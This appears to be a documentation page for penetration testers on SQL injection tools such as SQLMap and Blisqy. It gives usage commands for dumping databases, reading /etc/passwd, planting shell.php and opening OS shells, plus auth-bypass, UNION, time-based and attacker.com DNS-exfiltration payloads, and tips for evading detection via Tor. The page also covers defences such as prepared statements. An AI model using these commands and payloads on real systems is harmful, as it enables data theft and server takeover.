Skip to main content
Legal Notice: Only test SQL injection vulnerabilities on applications you own or have explicit written authorization to test. Unauthorized exploitation is illegal and can result in severe penalties.

Overview

SQL Injection (SQLi) remains one of the most critical web application vulnerabilities. These tools help security professionals identify, test, and exploit SQL injection flaws in web applications, databases, and APIs. They automate detection, dumping databases, and demonstrating the impact of SQLi vulnerabilities.

Use Cases

  • Vulnerability Assessment: Identify SQL injection points
  • Penetration Testing: Exploit SQLi to demonstrate impact
  • Database Enumeration: Extract database structure and data
  • Security Research: Analyze SQLi attack vectors
  • Bug Bounty Hunting: Find and report SQLi vulnerabilities

Available Tools

SQLMap

The most powerful automated SQLi tool

NoSQLMap

NoSQL database injection and exploitation

DSSS

Damn Small SQLi Scanner - lightweight scanner

Explo

Web security issue description framework

Blisqy

Time-based blind SQL injection exploiter

Leviathan

Wide-range mass audit toolkit with SQLi

SQLScan

Quick web scanner for SQL injection points

SQLMap

Description

SQLMap is the industry-standard open source penetration testing tool that automates detecting and exploiting SQL injection flaws. It supports all major database management systems and provides powerful features for database fingerprinting, data extraction, and even operating system takeover.

Installation

sudo git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev

Basic Usage

# Simple URL scan
python3 sqlmap.py -u "http://example.com/page.php?id=1"

# With POST data
python3 sqlmap.py -u "http://example.com/login.php" --data="username=admin&password=pass"

# Test specific parameter
python3 sqlmap.py -u "http://example.com/page.php?id=1&name=test" -p id

# Automated scan with wizard
python3 sqlmap.py --wizard

Advanced Features

# List databases
python3 sqlmap.py -u "URL" --dbs

# List tables in database
python3 sqlmap.py -u "URL" -D database_name --tables

# List columns in table
python3 sqlmap.py -u "URL" -D database_name -T table_name --columns

# Dump table data
python3 sqlmap.py -u "URL" -D database_name -T users --dump

# Dump all databases
python3 sqlmap.py -u "URL" --dump-all

# Test login form
python3 sqlmap.py -u "http://example.com/login" \
  --data="username=admin&password=pass" \
  --level=5 --risk=3

# With cookie authentication
python3 sqlmap.py -u "URL" \
  --cookie="PHPSESSID=abcd1234" \
  --level=2

# With custom headers
python3 sqlmap.py -u "URL" \
  --headers="Authorization: Bearer token123"

# Read file from server
python3 sqlmap.py -u "URL" --file-read="/etc/passwd"

# Write file to server
python3 sqlmap.py -u "URL" --file-write="shell.php" \
  --file-dest="/var/www/html/shell.php"

# Execute OS commands
python3 sqlmap.py -u "URL" --os-cmd="whoami"

# Get OS shell
python3 sqlmap.py -u "URL" --os-shell

# Get SQL shell
python3 sqlmap.py -u "URL" --sql-shell

Important Options

OptionDescriptionExample
-uTarget URL-u "http://site.com?id=1"
--dataPOST data--data="user=admin&pass=x"
-pTestable parameter-p id
--cookieHTTP Cookie value--cookie="session=abc123"
--levelTest level (1-5)--level=3
--riskRisk level (1-3)--risk=2
--dbsEnumerate databases--dbs
-DSpecify database-D mydatabase
-TSpecify table-T users
--dumpDump table data--dump
--batchNever ask for input--batch
--random-agentUse random User-Agent--random-agent
--torUse Tor network--tor

Usage Examples

# GET request with automatic fingerprinting
python3 sqlmap.py -u "http://example.com/product?id=1" --batch --banner

# POST request login form
python3 sqlmap.py -u "http://example.com/login" \
  --data="username=admin&password=test" \
  --level=5 --risk=3 --batch

# Extract specific data
python3 sqlmap.py -u "http://example.com/user?id=1" \
  -D website_db -T users -C username,password,email --dump

# Use with Burp Suite request file
python3 sqlmap.py -r request.txt --batch

# Stealthy scan with randomization
python3 sqlmap.py -u "http://example.com/page?id=1" \
  --random-agent --delay=2 --tor --check-tor
Performance: Use --threads=10 for faster scanning, but be cautious as high thread counts may crash the application or trigger security alerts.

NoSQLMap

Description

NoSQLMap is designed to audit and automate injection attacks against NoSQL databases like MongoDB, CouchDB, and Redis. As NoSQL databases gain popularity, testing for NoSQL injection becomes increasingly important.

Installation

git clone https://github.com/codingo/NoSQLMap.git
sudo chmod -R 755 NoSQLMap
cd NoSQLMap
python setup.py install

Running

python NoSQLMap

Features

  • MongoDB injection detection
  • CouchDB exploitation
  • Redis command injection
  • Automated data extraction
  • Authentication bypass
MongoDB Requirement: NoSQLMap requires MongoDB to be installed for full functionality.

DSSS - Damn Small SQLi Scanner

Description

DSSS is a lightweight, fully functional SQL injection vulnerability scanner supporting both GET and POST parameters. Perfect for quick scans and integration into automated workflows.

Installation

git clone https://github.com/stamparm/DSSS.git
cd DSSS

Usage

# Scan GET parameter
python3 dsss.py -u "http://example.com/page.php?id=1"

# Scan POST parameters
python3 dsss.py -u "http://example.com/login" --data="user=admin&pass=test"

# Scan with cookie
python3 dsss.py -u "http://example.com/page?id=1" --cookie="session=abc123"

# Help and options
python3 dsss.py -h

Features

  • Fast scanning (typically under 100 requests)
  • Minimal false positives
  • GET and POST support
  • Cookie-based testing
  • Lightweight and portable

Explo

Description

Explo is a tool to describe web security issues in both human and machine-readable format (YAML). It’s useful for documenting and sharing SQLi findings in a standardized way.

Installation

git clone https://github.com/dtag-dev-sec/explo.git
cd explo
sudo python setup.py install

Usage

# Run test case
explo testcase.yaml

# Verbose mode
explo --verbose testcase.yaml

# Run multiple tests
explo examples/*.yaml

Blisqy

Description

Blisqy specializes in finding and exploiting time-based blind SQL injection vulnerabilities in HTTP headers. This is particularly useful when traditional injection points are protected but headers are not.

Installation

git clone https://github.com/JohnTroony/Blisqy.git
cd Blisqy

Usage

# Test User-Agent header
python blisqy.py -u "http://example.com" -h "User-Agent"

# Test custom header
python blisqy.py -u "http://example.com" -h "X-Forwarded-For"

# With verbosity
python blisqy.py -u "http://example.com" -h "Referer" -v

Time-Based Blind SQLi

Time-based blind SQL injection exploits the ability to make the database sleep/delay:Example payloads:
# MySQL
1' AND SLEEP(5)--

# PostgreSQL  
1'; SELECT pg_sleep(5)--

# Microsoft SQL Server
1'; WAITFOR DELAY '00:00:05'--
Detection:
  • Normal response: < 1 second
  • Vulnerable response: 5+ seconds
Blisqy automates this process for HTTP headers.

Leviathan

Description

Leviathan is a comprehensive mass audit toolkit with service discovery, brute-force capabilities, SQL injection detection, and running custom exploits. Requires API keys for full functionality.

Installation

git clone https://github.com/leviathan-framework/leviathan.git
cd leviathan
sudo pip install -r requirements.txt

Running

cd leviathan
python leviathan.py

Features

  • Mass vulnerability scanning
  • Service discovery
  • SQL injection testing
  • Brute-force capabilities
  • Custom exploit integration
  • API integration (Shodan, Censys)

SQLScan

Description

SQLScan is a quick web scanner specifically designed to find SQL injection points rapidly. Written in PHP, it’s fast and easy to use.

Installation

# Install dependencies
sudo apt install php php-bz2 php-curl php-mbstring curl

# Download and install
sudo curl https://raw.githubusercontent.com/Cvar1984/sqlscan/dev/build/main.phar \
  --output /usr/local/bin/sqlscan
chmod +x /usr/local/bin/sqlscan

Running

sudo sqlscan

SQL Injection Types

Classic SQL Injection

# Authentication bypass
' OR '1'='1
admin'--
' OR 1=1--

# Union-based
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT username,password FROM users--

Blind SQL Injection

# Boolean-based
' AND 1=1--  (True condition)
' AND 1=2--  (False condition)

# Time-based
' AND SLEEP(5)--
'; WAITFOR DELAY '00:00:05'--

Second-Order SQL Injection

Payload is stored in database and executed in a different context later.

Out-of-Band SQL Injection

# DNS exfiltration (MS SQL)
'; exec master.dbo.xp_dirtree '\\'+@@version+'.attacker.com\share'--

Best Practices

Testing Methodology

  1. Identify Injection Points
    • URL parameters
    • POST data
    • Cookies
    • HTTP headers
    • File uploads
  2. Test for Vulnerability 
    # Start with simple payloads
'
''
`
"
--
#
  3. Determine Database Type 
    # MySQL
' AND @@version--

# PostgreSQL
' AND version()--

# MS SQL
' AND @@version--

# Oracle
' AND banner FROM v$version--
  4. Exploit Systematically
    • Enumerate databases
    • Extract table structure
    • Dump sensitive data
    • Assess further access

Avoiding Detection

# Use random User-Agent
sqlmap -u "URL" --random-agent

# Add delays between requests
sqlmap -u "URL" --delay=2

# Use Tor for anonymity
sqlmap -u "URL" --tor --check-tor

# Limit threads
sqlmap -u "URL" --threads=1

Documentation

Report Writing: Document all findings:
  • Injection point (parameter, header, etc.)
  • Payload used
  • Database type and version
  • Data extracted
  • Impact assessment
  • Remediation recommendations

Defense Mechanisms

After testing, recommend these protections:

Prepared Statements (Best Defense)

# Python with MySQL
import mysql.connector

cursor = connection.cursor(prepared=True)
query = "SELECT * FROM users WHERE username = %s"
cursor.execute(query, (username,))

// PHP with PDO
$stmt = $pdo->prepare('SELECT * FROM users WHERE username = :username');
$stmt->execute(['username' => $username]);

Input Validation

# Whitelist validation
import re

if re.match(r'^[a-zA-Z0-9_]+$', user_input):
    # Safe to use
else:
    # Reject input

Other Protections

  • Least Privilege: Database user should have minimal permissions
  • WAF: Web Application Firewall for additional layer
  • Escaping: Last resort, not recommended as primary defense
  • Error Handling: Don’t expose database errors to users
  • Monitoring: Log and alert on suspicious patterns

Troubleshooting

Solutions:
  • Increase level: --level=5
  • Increase risk: --risk=3
  • Test all parameters: -p "*"
  • Try different techniques: --technique=BEUSTQ
  • Check for WAF: --identify-waf
  • Bypass WAF: --tamper=space2comment
Verification:
  • Manually test the payload
  • Check response differences
  • Verify with alternative tools
  • Test with known-safe input
  • Examine actual database behavior
Optimization:
# Reduce threads
--threads=1

# Skip heavy checks
--no-cast --no-escape

# Limit techniques
--technique=B  # Boolean-based only

# Target specific DBMS
--dbms=MySQL

Additional Resources

Responsible Disclosure: If you find SQL injection vulnerabilities during authorized testing or bug bounty programs, report them responsibly. Never access, modify, or delete data beyond what’s necessary to demonstrate the vulnerability.

Build docs developers (and LLMs) love

Get started for freeTalk to us